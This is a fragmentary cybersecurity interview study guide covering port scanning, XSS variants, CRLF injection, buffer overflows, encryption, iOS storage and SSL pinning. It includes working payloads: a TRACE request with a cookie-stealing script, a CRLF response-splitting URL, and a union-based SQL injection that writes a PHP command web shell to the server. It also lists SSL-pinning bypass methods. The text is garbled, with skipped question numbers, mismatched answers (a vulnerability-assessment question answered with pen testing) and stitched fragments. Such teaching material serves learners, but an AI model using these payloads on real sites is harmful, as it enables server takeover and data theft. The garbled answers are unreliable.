Professional Documents
Culture Documents
Closed Port:
- If you send a SYN to a closed port, it will respond back with a RST.
Open Port:
- If you send a SYN to an open port, you would expect to receive a
SYN/ACK.
Filtered Port:
- Presumably, the host is behind some sort of firewall. If the packet is discarded and there is
no response this is typically considered a filtered port.
1|Page
Step 4
The next step is to configure your firewall rules for remote access.
54) What is more important for cybersecurity professionals to focus on, threats or
vulnerabilities?
These goals form the confidentiality, integrity, availability (CIA) triad, the basis of all security
programs. Information security professionals who create policies and procedures must
consider each goal when creating a plan to protect a computer system.
2. Integrity: This means that whenever there is a need for change in any document stored
beforehand or new, it can only be done by an authorized person with proper and secure
mechanism.
2|Page
3. Threat: Something that is necessary for exploiting the vulnerability either knowingly or
by accident in order to damage or destroy personal and official data.
57) What is the difference between Vulnerability Assessment and Penetration
Testing?
There is a considerable amount of confusion in the industry regarding the differences
between vulnerability scanning and penetration testing, as the two phrases are commonly
interchanged. However, their meaning and implications are very different. A vulnerability
assessment simply identifies and reports noted vulnerabilities, whereas a penetration test
(Pen Test) attempts to exploit the vulnerabilities to determine whether unauthorized access
or other malicious activity is possible.
58) What is Vulnerability Assessment?
Penetration testing (also called pen testing) is the practice of testing a computer system,
network or Web application to find vulnerabilities that an attacker could exploit.
Pen tests can be automated with software applications or they can be performed manually.
Either way, the process includes gathering information about the target before the test
(reconnaissance), identifying possible entry points, attempting to break in (either virtually
or for real) and reporting back the findings.
3|Page
XST (Cross Site Tracing) is combined Attack that includes HTTP TRACE METHOD and XSS
Techniques.
How to test if your server is vulnerable to XST.
To test if your server is vulnerable I will use Burp Suite. Open Burp and choose repeater.
Change the request to something similar to:
TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>
The reply should look like this if TRACE is enabled:
HTTP/1.1 200 OK
Date: Sun, 23 Sep 2007 02:48:05 GMT
Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29
Connection: close
Content-Type: message/http
TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>
Umph As we can see TRACE in response so this method is allowed. Now Let's try to Add a
new header if we can do it by using curl's -H option.
4|Page
oh ?? injected: P, so this application is prone to xss attacks via Trace method that is inshort
called Cross Site Tracing. If we don't see TRACE in response and see a source page, then trace
method is disabled.
Defenses
Prevention of this vulnerability is really simple. If your using apache then you need to
install the mod_rewrite engine. Add the following lines to your httpd.conf file.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
If your using IIS then you need to filter out everything but GET, POST, and HEAD
with urlScan.
61) What is Self XSS?
Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into
paste the malicious code in browser. Results in attacker accessing to the whatever website
you visit. Usually scammers use this attack for tricking users to buy products or get money
through online survey.
Javascript can be executed in browser url bar.
For example , enter the following code in your browser:
javascript:alert(‘BreakTheSecurity’);
This will show a pop up box with “BreakTheSecurity”. An attacker can use this for
malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and
more.
For Eg:
Entering the following code will display the cookies in your browser:
javascript:alert(“Cookies:”+document.cookies+” “+”n By n BreakTheSecurity”);
5|Page
The above code is not going to anything maliciously other than displaying the cookies. But
an attacker can extend the script so that it can take advantage your data.
Security Tips from BreakTheSecurity:
Use NoScript add on that will prevent javascript running in your browser.
Don’t click the shorthand urls for Example: bit.ly/55ewEb?22. This may redirect to
an infected sites.
If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never
do this mistake.
If anyone says “Iphone only $10”, Don’t eager to click it.
If anyone says “1000 shares will cure a baby”, Never do this mistake. Facebook shares
never help to get money or help to cure baby.
Read our EHN spam report to know the latest updates about the facebook scams.
It tricked the user into “Liking” an item on Facebook. Clickjacking has also been used in the
past to:
Harvest login credentials, by rendering a fake login box on top of the real one.
Trick users into turning on their web-cam or microphone, by rendering invisible
elements over the Adobe Flash settings page.
6|Page
Spread worms on social media sites like Twitter and MySpace.
Promote online scams by tricking people into clicking on things they otherwise would
not.
Spread malware by diverting users to malicious download links.
Also, when a web site is vulnerable to clickjacking, it is possible for the attacker to disable
cross-site request forgery (CSRF) token protection, which protects against CSRF attacks that
trick browsers into doing things without the user’s knowledge or permission.
ClickJacking as a method of delivery for Blind XSS.
This vulnerability can be linked to a multitude of attacks including keylogging and stealing
user credentials.
63) What is Blind XSS?
It is a type of stored XSS where attackers input is saved by server and is reflected in a totally
different application used by system admin/team member.
Impact
There are many different attacks that can be leveraged through the use of cross-site
scripting, including:
Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.
64) What is CRLF or HTTP Response splitting?
When a browser sends a request to a web server, the web server answers back with a
response containing both the HTTP headers and the actual website content. The HTTP
headers and the HTML response (the website content) are separated by a specific
combination of special characters, namely a carriage return and a line feed. For short they
are also known as CRLF.
The server knows when a new header begins and another one ends with CRLF, which can
also tell a web application or user that a new line begins in a file or in a text block.
In a CRLF injection vulnerability attack the attacker inserts carriage return, linefeed both of
the characters into user input to trick the server, web application or the user into thinking
that an object is terminated and another one has started.
CRLF Injection Vulnerability is a web application vulnerability happens due to direct passing
of user entered data to the response header fields like (Location, Set-Cookie and etc) without
proper sanitsation, which can result in various forms of security exploits. Security exploits
range from XSS, Cache-Poisoning, Cache-based defacement, page injection and etc.
7|Page
CRLF injection, or HTTP response splitting, is a type of injection attack that can lead to Cross-
site Scripting (XSS) and web cache poisoning among others.
CRLF refers to the Carriage Return and Line Feed sequence of special characters. These two
special characters represent the End of Line (EOL) marker for many internet protocols,
including HTTP. Web applications typically split headers based on where the CRLF character
sequence is found. Therefore, if a malicious user is able to inject their own CRLF sequence
into an HTTP stream, they gain control over the contents of the HTTP response.
Since CRLF characters can be used to split an HTTP response header, it is often also referred
to as HTTP Response Splitting. The following example is a crafted request containing CRLF
(the %0d%0a characters in the request below) that causes Cross-site Scripting.
http://www.yoursite.com/somepage.php?page=%0d%0aContent-Type:
text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:
text/html%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
The victim will see the following in their browser.
<script>alert(1)</script>
Variations of this attack can be used to poison proxy or web caches in order to get the cache
to serve the attacker’s content to other users.
Impacts of the CRLF injection Vulnerability
The impact of CRLF injections vary and also include all the impacts of Cross-site Scripting to
information disclosure. It can also deactivate certain security restrictions like XSS Filters and
the Same Origin Policy in the victim's browsers, leaving them susceptible to malicious
attacks.
65) How to Upload Shells from SQL injection?
File Upload with SQL Injection
If we find Union-Based SQL Injection, we can upload file to server. To upload a file, we
should know directory structure of the server.
As i said we need to know directory structure or root path of server and usually, we will see
directory structure in SQL errors.
Example SQL Error:
Warning: mysql_fetch_assoc() expects parameter 2 to be resource, boolean given in
C:\wamp\www\db_connect.php on line 136
In this example, the web server is running in “C:\wamp\www”. SQL query which uploads a
basic CMD shell is given below.
8|Page
Example SQL Query:
select "<? system($_GET['cmd’]);?>" into outfile "C:/wamp/www/shell.php"
Now it’s time to merge the SQL query with the SQL injection.
File Upload Example:
URL : http://www.example.com/product.php?id=5 union all select "<?
system($_GET['cmd’]); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php" --
SQL Query : select * from products where id=5 union all select "<? system($_GET['cmd’]);
?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php”--
Shell file is ready to be use. We can reach Shell file at http://www.example.com/shell.php .
If command execution via SQL injection is not enough for you, try it with metasploit.
9|Page
MYSQL free to use and MS SQL requires payment for license to use
MySQL uses lower disk space; MS SQL uses higher disk space
MySQL cross compatible with other platforms such as Unix and Linux
MS SQL not compatible with other platforms
MySQL does not foreign keys while MS SQL supports their use.
67) What is a buffer overflow attack?
A buffer overflow, or buffer overrun, is a common software coding mistake that an attacker
could exploit to gain access to your system.
A buffer overflow occurs when more data are written to a buffer than it can hold. The excess
data is written to the adjacent memory, overwriting the contents of that location and causing
unpredictable results in a program. Buffer overflows happen when there is improper
validation (no bounds prior to the data being written. It is considered a bug or weakness in
the software.
A buffer is a temporary area for data storage. When more data (than was originally allocated
to be stored) gets placed by a program or system process, the extra data overflows. It causes
some of that data to leak out into other buffers, which can corrupt or overwrite whatever
data they were holding.
In a buffer-overflow attack, the extra data sometimes holds specific instructions for actions
intended by a hacker or malicious user; for example, the data could trigger a response that
damages files, changes data or unveils private information.
This vulnerability can cause a system crash or, worse, create an entry point for a cyberattack.
C and C++ are more susceptible to buffer overflow.
Attackers can exploit a buffer overflow bug by injecting code that is specifically tailored to
cause buffer overflow with the initial part of a data set, then writing the rest of the data to
the memory address adjacent to the overflowing buffer. The overflow data might contain
executable code that allows the attackers to run bigger and more sophisticated programs or
grant themselves access to the system.
There are two types of buffer overflows: stack-based and heap-based. Heap-based, which are
difficult to execute and the least common of the two, attack an application by flooding the
memory space reserved for a program. Stack-based buffer overflows, which are more
common among attackers, exploit applications and programs by using what is known as a
stack: memory space used to store user input.
68) What are Encryption, Decryption, Key & Steganography?
Encryption: It is the process of locking up information using cryptography. Information that
has been locked this way is encrypted.
10 | P a g e
Decryption: The process of unlocking the encrypted information using cryptographic
techniques.
Key: A secret like a password used to encrypt and decrypt information. There are a few
different types of keys used in cryptography.
Steganography: It is actually the science of hiding information from people who would snoop
on you. The difference between steganography and encryption is that the would-be snoopers
may not be able to tell there’s any hidden information in the first place.
69) What are differences between Symmetric & Asymmetric Encryption?
Symmetrical Encryption
This is the simplest kind of encryption that involves only one secret key to cipher and
decipher information. Symmetrical encryption is an old and best-known technique. It uses a
secret key that can either be a number, a word or a string of random letters. It is a blended
with the plain text of a message to change the content in a particular way. The sender and
the recipient should know the secret key that is used to encrypt and decrypt all the messages.
Blowfish, AES, RC4, DES, RC5, and RC6 are examples of symmetric encryption. The most
widely used symmetric algorithm is AES-128, AES-192, and AES-256.
The main disadvantage of the symmetric key encryption is that all parties involved have to
exchange the key used to encrypt the data before they can decrypt it.
11 | P a g e
Asymmetrical Encryption
Asymmetrical encryption is also known as public key cryptography, which is a relatively new
method, compared to symmetric encryption. Asymmetric encryption uses two keys to
encrypt a plain text. Secret keys are exchanged over the Internet or a large network. It
ensures that malicious persons do not misuse the keys. It is important to note that anyone
with a secret key can decrypt the message and this is why asymmetrical encryption uses two
related keys to boosting security. A public key is made freely available to anyone who might
want to send you a message. The second private key is kept a secret so that you can only
know.
A message that is encrypted using a public key can only be decrypted using a private key,
while also, a message encrypted using a private key can be decrypted using a public key.
Security of the public key is not required because it is publicly available and can be passed
over the internet. Asymmetric key has a far better power in ensuring the security of
information transmitted during communication.
To use asymmetric encryption, there must be a way of discovering public keys. One typical
technique is using digital certificates in a client-server model of communication. A certificate
is a package of information that identifies a user and a server. It contains information such
as an organization’s name, the organization that issued the certificate, the users’ email
address and country, and users public key.
12 | P a g e
When a server and a client require a secure encrypted communication, they send a query
over the network to the other party, which sends back a copy of the certificate. The other
party’s public key can be extracted from the certificate. A certificate can also be used to
uniquely identify the holder.
SSL/TLS uses both asymmetric and symmetric encryption, quickly look at digitally signed
certificates issued by trusted certificate authorities (CAs).
Contents in an IPA
Payload - Contains the .app folder of the specific iOS application. Under the .app folder we
can see the application’s contents like the images, nib files which store the user interface and
so on.
13 | P a g e
Mach-O Executable - Mach Object files are file formats for executables.
Contains data section, header and load commands.
Info.plist - Stores the configuration information of the executable. Can be
viewed with a text editor. If it is in a binary format, can be converted using
plutil -convert xml1 Info.plist
Frameworks - Folder with libraries the application uses. There are many
third party libraries. For example, the AWS SDK.
Mobileprovision - Information such as the developer certificate, devices
for which the application is provisioned or team identifier can be found
under embedded.mobileprovision
72) What are the types of local storages in an iOS application?
Here we will explore local iOS data storage guidelines for iOS apps intended to keep certain
information locally. Local storage is meant for retaining web app data locally using certain
frameworks, tools and methods distinctive to different platforms. For iOS storage there are
different methods to choose from. The choice, however, depends upon what and how much
data you want to store. Most of the times more than one method is required to implement
local storage in iOS apps, as there are different persistence needs of the application viz. data
gathered from web browsing, user preferences, and application settings. The most widely
used methods for local storage implementation in iOS are:
SQLite
Property List
Core Data
NSUser Defaults
Key Chain
SQLite for iOS Local Data Storage
SQLite is a powerful lightweight C library that is embedded in an iOS application. This is used
in various applications across various platforms including Android and iOS. It uses SQL-
centric API to operate the data tables directly. Using SQLite C library for local data storage
implementation in iOS applications, one needs to be very meticulous when passing in strings
and arguments required for the functions.
Property List
Another most common method of storing data in iOS application is in Property List files.
Documents in property list contain either an NSDictionary or an NSArray, inside which there
is archived data. There are number of classes that can be archived into the PList, viz. NSArray,
14 | P a g e
NSDate, NSString, NSDictionary and NSdictionary. Objects other than these cannot be
archived as a property list and will not be able to write the file. One has to be very particular
about listing items into the classes, for instance to store a Boolean or Integer object only
NSNumber class is used. Boolean or Integer object must not be given to any objects in
NSDictionary or NSArray.
Core Data
Core Data is the method recommended by Apple for local storage of app’s data. By default,
core data uses SQLite as its main database in the iOS app. Internally Core Data make use of
SQLite queries to save and store its data locally, which is why all the files are stored as .db
files. This also eliminates the need to install a separate database. In iOS this framework
allows for two different database storage types but by default it is SQLite. Core Data allows
you deal with common functionalities of an app like, restore, store, undo and redo.
NSUserDefaults
To save properties in any application and user preferences, NSUserDefaults is one of the
most common methods for local data storage. This is used to save logged in state of the user
within an application, so that the app can fetch this data even when user access the
application at some other time. In some of the iOS apps this method is used to save user’s
confidential information like access token.
Key Chain
Most of the time developers avoid implementing key chain method to save data as the
method follows a complicated procedure. If the device is jail broken, none of your data is
secure. This is the most secure and reliable method to store data on a non-jailbroken device.
Simple wrapper classes are used to store data using key chain method.
73) What is ssl pinning?
SSL Pinning is making sure the client checks the server’s certificate against a known copy of
that certificate. Simply bundle your server’s SSL certificate inside your application, and make
sure any SSL request first validates that the server’s certificate exactly matches the bundle’s
certificate. SSL pinning prevents someone from using a false SSL certificate to breach the
trust between users, developers, and applications.
Typically, during the SSL or TLS handshake, when a client connects to a server, the server
sends its digital certificate. If the certificate is issued by a Certificate Authority that is trusted
by the mobile device OS, the connection is allowed. The data is sent through the connection,
and is encrypted with the server’s public key. This process establishes a trust relationship.
An attacker performing a “man in the middle” attack, makes the mobile device trust the
attacker’s certificate. Typically, an attacker's certificate is not signed by a Certificate
Authority trusted by the mobile device OS, but there is no certainty. In iOS 4.3.5, there was a
15 | P a g e
vulnerability where "an attacker with a privileged network position" could capture or modify
data in sessions that were protected by SSL/TLS.
BENEFITS
Increased security - with pinned SSL certificates, the app is independent of the device’s
trust store. Compromising the hard coded trust store in the app is not so easy - the app would
need to be decompiled, changed and then recompiled again - and it can’t be signed using the
same Android keystore that the original developer of the app used.
Reduced costs - SSL certificate pinning gives you the possibility to use a self-signed
certificate that can be trusted. For example, you’re developing an app that uses your own API
server. You can reduce the costs by using a self-signed certificate on your server (and pinning
that certificate in your app) instead of paying for a certificate. Although a bit convoluted, this
way, you've actually improved security and saved yourself some money.
DRAWBACKS
Less flexibility - when you do SSL certificate pinning, changing the SSL certificate is not that
easy. For every SSL certificate change, you have to make an update to the app, push it to
Google Play and hope the users will install it.
74) How to bypass ssl pinning?
Disable Certificate pinning in code with decompiling APK and compiling again.
Disable SSL Pinning with special tool inside in your phone (SSL Kill Switch)
Disable SSL Pining with IPAPatch tool for iOS
Adding a custom CA to the trusted certificate store
Overwriting a packaged CA cert with a custom CA cert
Using Frida to hook and bypass SSL certificate checks
Reversing custom certificate code
75) What is AAA?
Authentication is the process of identifying an individual, usually based on a username and
password. Authentication is based on the idea that each individual user will have unique
information that sets him or her apart from other users.
Authorization is the process of granting or denying a user access to network resources once
the user has been authenticated through the username and password. The amount of
information and the amount of services the user has access to depend on the user's
authorization level.
Accounting is the process of keeping track of a user's activity while accessing the network
resources, including the amount of time spent in the network, the services accessed while
there and the amount of data transferred during the session. Accounting data is used for
trend analysis, capacity planning, billing, auditing and cost allocation.
16 | P a g e
AAA services often require a server that is dedicated to providing the three services. RADIUS
is an example of an AAA service.
17 | P a g e